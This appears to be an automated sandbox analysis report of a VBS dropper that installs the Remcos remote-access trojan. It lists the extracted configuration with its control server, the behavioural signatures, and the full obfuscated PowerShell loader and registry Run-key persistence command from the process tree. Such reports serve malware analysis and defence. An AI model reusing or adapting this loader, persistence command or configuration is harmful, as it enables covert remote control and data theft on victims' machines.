Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-10-2024 01:40
Static task
static1
Behavioral task
behavioral1
Sample
6ec4d17c4b6ed9a5f6095cf7ea6996fb1b2413b56868ef2841864c526bcaf8ef.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
6ec4d17c4b6ed9a5f6095cf7ea6996fb1b2413b56868ef2841864c526bcaf8ef.vbs
Resource
win10v2004-20241007-en
General
-
Target
6ec4d17c4b6ed9a5f6095cf7ea6996fb1b2413b56868ef2841864c526bcaf8ef.vbs
-
Size
11KB
-
MD5
cc0e7dfe16fd08c66618813f953bb879
-
SHA1
937e890a06805c035807b202c3e403b222f11427
-
SHA256
6ec4d17c4b6ed9a5f6095cf7ea6996fb1b2413b56868ef2841864c526bcaf8ef
-
SHA512
34d2cb946a4f6dae0cd5b93a990bb13638959c304eb79d5ab442bd86692349d021c4cf225b0be321f63892d51023beb6097ff18f5280e0d28d95c4c1ada53058
-
SSDEEP
192:i3ICKmusCg05C6FLf7ifqMtgQoVcoNorNAJUgZ4n8:vEQ7ifqMzo0OW8
Malware Config
Extracted
remcos
PeeWe8646
www.autoshausamsachsenwald.de:6698
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Weepee83472-FSSJ2L
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 41 IoCs
flow pid Process 8 3352 powershell.exe 34 3412 powershell.exe 35 3412 powershell.exe 38 3412 powershell.exe 39 3412 powershell.exe 40 3412 powershell.exe 47 3412 powershell.exe 55 3412 powershell.exe 56 3412 powershell.exe 57 3412 powershell.exe 58 3412 powershell.exe 59 3412 powershell.exe 60 3412 powershell.exe 61 3412 powershell.exe 62 3412 powershell.exe 65 3412 powershell.exe 67 3412 powershell.exe 71 3412 powershell.exe 72 3412 powershell.exe 75 3412 powershell.exe 77 3412 powershell.exe 79 3412 powershell.exe 80 3412 powershell.exe 81 3412 powershell.exe 82 3412 powershell.exe 83 3412 powershell.exe 84 3412 powershell.exe 95 3412 powershell.exe 96 3412 powershell.exe 97 3412 powershell.exe 98 3412 powershell.exe 99 3412 powershell.exe 100 3412 powershell.exe 101 3412 powershell.exe 102 3412 powershell.exe 103 3412 powershell.exe 108 3412 powershell.exe 109 3412 powershell.exe 110 3412 powershell.exe 111 3412 powershell.exe 112 3412 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Zanjero = "%Kuls110% -windowstyle 1 $Baghuse=(gp -Path 'HKCU:\\Software\\Datafirmas\\').blokhvl;%Kuls110% ($Baghuse)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3412 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3412 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1520 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3352 powershell.exe 3352 powershell.exe 3412 powershell.exe 3412 powershell.exe 3412 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3352 powershell.exe Token: SeDebugPrivilege 3412 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4836 wrote to memory of 3352 4836 WScript.exe 86 PID 4836 wrote to memory of 3352 4836 WScript.exe 86 PID 3412 wrote to memory of 2936 3412 powershell.exe 104 PID 3412 wrote to memory of 2936 3412 powershell.exe 104 PID 3412 wrote to memory of 2936 3412 powershell.exe 104 PID 2936 wrote to memory of 1520 2936 cmd.exe 107 PID 2936 wrote to memory of 1520 2936 cmd.exe 107 PID 2936 wrote to memory of 1520 2936 cmd.exe 107
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6ec4d17c4b6ed9a5f6095cf7ea6996fb1b2413b56868ef2841864c526bcaf8ef.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sygehuse Rappenskralder Sandwichs Gliridae tonsillitis Bolsjevikkens Spejlmonogrammers #>;$Gasradiatorernes='Lighedens';<#Legitimationers Ink Pedalian Bonzery nonnative Forjoges Allods #>;$Athwarthawse=$host.PrivateData;If ($Athwarthawse) {$Likableness++;}function henaandende($Doohinkus){$Tabira=$Lommeregnere+$Doohinkus.Length-$Likableness;for( $relativpronominernes=2;$relativpronominernes -lt $Tabira;$relativpronominernes+=3){$Toolsheds='Absenteres';$Bide+=$Doohinkus[$relativpronominernes];}$Bide;}function Webbank($Disintegrator91){ & ($Kilovar) ($Disintegrator91);}$Wrinklet=henaandende 'diM otrzIni lFalPaaGi/Ju5D .P,0 F Ku( aW Ni,enW d roSuwTrsRn P,N,pT e i1 g0Ko.Tr0Pe;Si ,pWUniH nVa6L,4Ru;Tr S.xGa6Br4,t;Re MorAnv.a:Zo1Or2Pr1Va.Py0 B).t BiGSueU c .kR o,a/Fo2 k0 l1 S0Pa0Ve1Es0 a1 m SuFOniS,rlgeRnfReoPhxDo/R 1Sy2Lu1Fa.D,0ma ';$Underhandle=henaandende ' ,uUnSM EStRN -.laFlGVee LN oT , ';$undercrossing=henaandende 'OshAft StKlp,esF :S /re/Liw DwSuwFy. MaC,uThtfooH h daSpu RsOz-O c Fn F. RdJeeLe/B oanlSed o/ RmR oU,bsaiGelTieBl/PrB eaKanS a.auI s TiUnc I.TiqBaxCodBg ';$Blindtablets122=henaandende 'Ur>U ';$Kilovar=henaandende 'GlI BeJeXP ';$Amtsborgmester='asyl';$Kimm='\prefectorial.Twa';Webbank (henaandende 'Co$Ceg el.uoAkbMua l :HeTAniMad TsXsiI nF dEdsWatFri elP.lTee urNe=A $une anKiv P:ScaJup LpcadPraEntUraAn+H $RaKOciRam mmU. ');Webbank (henaandende ' a$U g rl Wo,abZoaLylS :BeTCoeP,kTesRatBikHerPri FtVdi,nk i=Ob$Meu nDedLaeSlrGlc ,r ,op,sAusUni TnExgIm. WsStp Pl TiCotl (Vo$MaBTilDiiHyn,rdLat.ma .b fl leFit.asDi1Ba2Be2 I).n ');Webbank (henaandende '.a[MiNLoeF.t G.KaSineTerLavKei ,cS eOvPS,o .iNon tn M iaAnn uaDogSte Arty]va: G:P SO eTocPruanrHui Jt .yFoP Dr o PtKio IcUnoFolTo .= P Dy[ sNEreCotUn.KoS Ee ycsputrr TiKntDoyF PTerL oRotAuoSkcH oImlKoTDey epPreSa] S: .:SaTMalR s v1 a2 . ');$undercrossing=$Tekstkritik[0];$relativpronominernesnterlaces=(henaandende ' ,$MiGPaL uo,fBI A .l A:krTFrRNekIsKUnr eOnogSkEMyn Ce a=VinPueSiwAf- OO RB ojR eUlC,atLo toS .YemS RT E M ,. GnSte At .. qw oEPab ncixL BIFeEInnBhT r ');Webbank ($relativpronominernesnterlaces);Webbank (henaandende 'R,$UnTBrr vkOrkK.rNeoCogVie ,n AeSk. lHCae Da rdH eSar sFl[Tr$noUDrnM d eW r hhTraDon adSolHieH ] e=la$KaWF,r yi dn,hkFalV.eSatT. ');$Affaldspriserne=henaandende ' $SaTShr .kudkSpr oVeg,eeSen oe n.M DBro Sws,nPal toCoa.nd.rFHeiCal ae S(Da$JuuU nTad,oe lr CcGer Do s ssOpiKonDegpi,Af$.fP,ueFonW n .aIdt.ii Us Ue Bc ,t eLsdMi)G ';$Pennatisected=$Tidsindstiller;Webbank (henaandende ' ,$V,gChLO.O SbM,a l m:DitDoRAtaSlA dB,rVoEKoN.eSDiEViR Es o=An( GT AeMeSK.TOr- p AVaTThH o De$FoPHae jnO NSpa,iTS iDaSPeEM.c PtTieTaDSe)Re ');while (!$Traadrensers) {Webbank (henaandende 'Ka$ungMilSoo bP,a.klUn:PeSMejSplOvls.n MdFae nrR,eBesC.=,a$ ht KrEjuU.eOp ') ;Webbank $Affaldspriserne;Webbank (henaandende ' ,S .t.ka Or OtL.-GeSKal.eeApeCopRe Ko4 A ');Webbank (henaandende ' $FlgU lDroTrbI ac l :WiTTrr TaS aMudgirAveStnSpsSleByrMisWi= e( KT,ee os.pt n-BaP haC tVuhUs Fr$ P ge rnScn,oa Ct aiBesIveBec Pt SeStdPa)Bi ') ;Webbank (henaandende 'B $ ugPrlFioS b PaGrlAn:LeDSkeTen.us uiE tKro Fm ee FtSlrG.iMisGakK e =Un$Peg,al noInb OaPalr :FiD UeAkpS.t Ch,eiPrnRegUd+Su+ n%Ma$ iTveePikO sBat GkSyrF i.rt diAnk l. ScJuo AudinDut.e ') ;$undercrossing=$Tekstkritik[$Densitometriske];}$Forsire=308882;$Barrikaderes=29015;Webbank (henaandende ' $Brg ,lMioAkbElaDelRe: BSIntFinRhgSpeU.tN s.i E.=Bf XaGInetrtPh-KaC aoShnIntT e anBat,g Sp$ RPKeeAknManStaSkt.eistsUde ,cSltTre Nd.n ');Webbank (henaandende 'Ch$N g FlKaoSkbFla,alUf:StB.ir .u vtL.tDooGrtC,rSikD.kngoPhrSnt feL.nSae e r=Co Fo[KaSC.y msSotKjeJem.o. aCSuoR.nBrvSmeBerJut E]He: E:SaFInrS o om oBF.aFosW eW.6F 4InS tUnrJei lnAkgVo( M$ScSGetHonW gFaeL.t ,sEr)Ji ');Webbank (henaandende ' .$T gSplOvoB b OaBalk : oS RmluiFitMih AiKanKngBe .i=Un To[SpSHuyA sTot teU,m T.S TKoe axSytHy.daE lnTucC.oNud,ai Fn sgMa]Co:Fo:StA rSTrC DITaIni.TeGCoeOrtAnS etirrM i InS g W(Pr$.pBOpr vuMutSitInoydt rOukKykg,oc,r Ctpae.enFieKu)Af ');Webbank (henaandende 'Pe$ChgGrlTioTabU aB lP :FaFCalKnlDeeVesAft TiMulFol iTodAlsExmbanCodF =Jr$P,SCemHeiAntBeh IiSan ,gTw.Sts muB.bKesR,tSur,iiVin ,g S(R $,pF oH.r is i rOieF,, .$ UB EaIor SrBli kB aUndRae FrM e Rs )F, ');Webbank $Fllestillidsmnd;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Sygehuse Rappenskralder Sandwichs Gliridae tonsillitis Bolsjevikkens Spejlmonogrammers #>;$Gasradiatorernes='Lighedens';<#Legitimationers Ink Pedalian Bonzery nonnative Forjoges Allods #>;$Athwarthawse=$host.PrivateData;If ($Athwarthawse) {$Likableness++;}function henaandende($Doohinkus){$Tabira=$Lommeregnere+$Doohinkus.Length-$Likableness;for( $relativpronominernes=2;$relativpronominernes -lt $Tabira;$relativpronominernes+=3){$Toolsheds='Absenteres';$Bide+=$Doohinkus[$relativpronominernes];}$Bide;}function Webbank($Disintegrator91){ & ($Kilovar) ($Disintegrator91);}$Wrinklet=henaandende 'diM otrzIni lFalPaaGi/Ju5D .P,0 F Ku( aW Ni,enW d roSuwTrsRn P,N,pT e i1 g0Ko.Tr0Pe;Si ,pWUniH nVa6L,4Ru;Tr S.xGa6Br4,t;Re MorAnv.a:Zo1Or2Pr1Va.Py0 B).t BiGSueU c .kR o,a/Fo2 k0 l1 S0Pa0Ve1Es0 a1 m SuFOniS,rlgeRnfReoPhxDo/R 1Sy2Lu1Fa.D,0ma ';$Underhandle=henaandende ' ,uUnSM EStRN -.laFlGVee LN oT , ';$undercrossing=henaandende 'OshAft StKlp,esF :S /re/Liw DwSuwFy. MaC,uThtfooH h daSpu RsOz-O c Fn F. RdJeeLe/B oanlSed o/ RmR oU,bsaiGelTieBl/PrB eaKanS a.auI s TiUnc I.TiqBaxCodBg ';$Blindtablets122=henaandende 'Ur>U ';$Kilovar=henaandende 'GlI BeJeXP ';$Amtsborgmester='asyl';$Kimm='\prefectorial.Twa';Webbank (henaandende 'Co$Ceg el.uoAkbMua l :HeTAniMad TsXsiI nF dEdsWatFri elP.lTee urNe=A $une anKiv P:ScaJup LpcadPraEntUraAn+H $RaKOciRam mmU. ');Webbank (henaandende ' a$U g rl Wo,abZoaLylS :BeTCoeP,kTesRatBikHerPri FtVdi,nk i=Ob$Meu nDedLaeSlrGlc ,r ,op,sAusUni TnExgIm. WsStp Pl TiCotl (Vo$MaBTilDiiHyn,rdLat.ma .b fl leFit.asDi1Ba2Be2 I).n ');Webbank (henaandende '.a[MiNLoeF.t G.KaSineTerLavKei ,cS eOvPS,o .iNon tn M iaAnn uaDogSte Arty]va: G:P SO eTocPruanrHui Jt .yFoP Dr o PtKio IcUnoFolTo .= P Dy[ sNEreCotUn.KoS Ee ycsputrr TiKntDoyF PTerL oRotAuoSkcH oImlKoTDey epPreSa] S: .:SaTMalR s v1 a2 . ');$undercrossing=$Tekstkritik[0];$relativpronominernesnterlaces=(henaandende ' ,$MiGPaL uo,fBI A .l A:krTFrRNekIsKUnr eOnogSkEMyn Ce a=VinPueSiwAf- OO RB ojR eUlC,atLo toS .YemS RT E M ,. GnSte At .. qw oEPab ncixL BIFeEInnBhT r ');Webbank ($relativpronominernesnterlaces);Webbank (henaandende 'R,$UnTBrr vkOrkK.rNeoCogVie ,n AeSk. lHCae Da rdH eSar sFl[Tr$noUDrnM d eW r hhTraDon adSolHieH ] e=la$KaWF,r yi dn,hkFalV.eSatT. ');$Affaldspriserne=henaandende ' $SaTShr .kudkSpr oVeg,eeSen oe n.M DBro Sws,nPal toCoa.nd.rFHeiCal ae S(Da$JuuU nTad,oe lr CcGer Do s ssOpiKonDegpi,Af$.fP,ueFonW n .aIdt.ii Us Ue Bc ,t eLsdMi)G ';$Pennatisected=$Tidsindstiller;Webbank (henaandende ' ,$V,gChLO.O SbM,a l m:DitDoRAtaSlA dB,rVoEKoN.eSDiEViR Es o=An( GT AeMeSK.TOr- p AVaTThH o De$FoPHae jnO NSpa,iTS iDaSPeEM.c PtTieTaDSe)Re ');while (!$Traadrensers) {Webbank (henaandende 'Ka$ungMilSoo bP,a.klUn:PeSMejSplOvls.n MdFae nrR,eBesC.=,a$ ht KrEjuU.eOp ') ;Webbank $Affaldspriserne;Webbank (henaandende ' ,S .t.ka Or OtL.-GeSKal.eeApeCopRe Ko4 A ');Webbank (henaandende ' $FlgU lDroTrbI ac l :WiTTrr TaS aMudgirAveStnSpsSleByrMisWi= e( KT,ee os.pt n-BaP haC tVuhUs Fr$ P ge rnScn,oa Ct aiBesIveBec Pt SeStdPa)Bi ') ;Webbank (henaandende 'B $ ugPrlFioS b PaGrlAn:LeDSkeTen.us uiE tKro Fm ee FtSlrG.iMisGakK e =Un$Peg,al noInb OaPalr :FiD UeAkpS.t Ch,eiPrnRegUd+Su+ n%Ma$ iTveePikO sBat GkSyrF i.rt diAnk l. ScJuo AudinDut.e ') ;$undercrossing=$Tekstkritik[$Densitometriske];}$Forsire=308882;$Barrikaderes=29015;Webbank (henaandende ' $Brg ,lMioAkbElaDelRe: BSIntFinRhgSpeU.tN s.i E.=Bf XaGInetrtPh-KaC aoShnIntT e anBat,g Sp$ RPKeeAknManStaSkt.eistsUde ,cSltTre Nd.n ');Webbank (henaandende 'Ch$N g FlKaoSkbFla,alUf:StB.ir .u vtL.tDooGrtC,rSikD.kngoPhrSnt feL.nSae e r=Co Fo[KaSC.y msSotKjeJem.o. aCSuoR.nBrvSmeBerJut E]He: E:SaFInrS o om oBF.aFosW eW.6F 4InS tUnrJei lnAkgVo( M$ScSGetHonW gFaeL.t ,sEr)Ji ');Webbank (henaandende ' .$T gSplOvoB b OaBalk : oS RmluiFitMih AiKanKngBe .i=Un To[SpSHuyA sTot teU,m T.S TKoe axSytHy.daE lnTucC.oNud,ai Fn sgMa]Co:Fo:StA rSTrC DITaIni.TeGCoeOrtAnS etirrM i InS g W(Pr$.pBOpr vuMutSitInoydt rOukKykg,oc,r Ctpae.enFieKu)Af ');Webbank (henaandende 'Pe$ChgGrlTioTabU aB lP :FaFCalKnlDeeVesAft TiMulFol iTodAlsExmbanCodF =Jr$P,SCemHeiAntBeh IiSan ,gTw.Sts muB.bKesR,tSur,iiVin ,g S(R $,pF oH.r is i rOieF,, .$ UB EaIor SrBli kB aUndRae FrM e Rs )F, ');Webbank $Fllestillidsmnd;"1⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Zanjero" /t REG_EXPAND_SZ /d "%Kuls110% -windowstyle 1 $Baghuse=(gp -Path 'HKCU:\Software\Datafirmas\').blokhvl;%Kuls110% ($Baghuse)"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Zanjero" /t REG_EXPAND_SZ /d "%Kuls110% -windowstyle 1 $Baghuse=(gp -Path 'HKCU:\Software\Datafirmas\').blokhvl;%Kuls110% ($Baghuse)"3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1520
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
439KB
MD5877ad64824efe0b9c09cf1b5ec61df62
SHA195fcbcc088e47bce6afae1458f5eec768eb87740
SHA2566622db47173128823c886ab3db72b7bf99df9e4f5cf2c6d85e17da4177892622
SHA512206af51df2505e4d4e126c8c6f62a457f0d7c083da45c16ef73fc4088b311d70f5f8abbe29259f5d36e0328f5574c149aa882366f0dcc54d5e56d3b4a08e61f0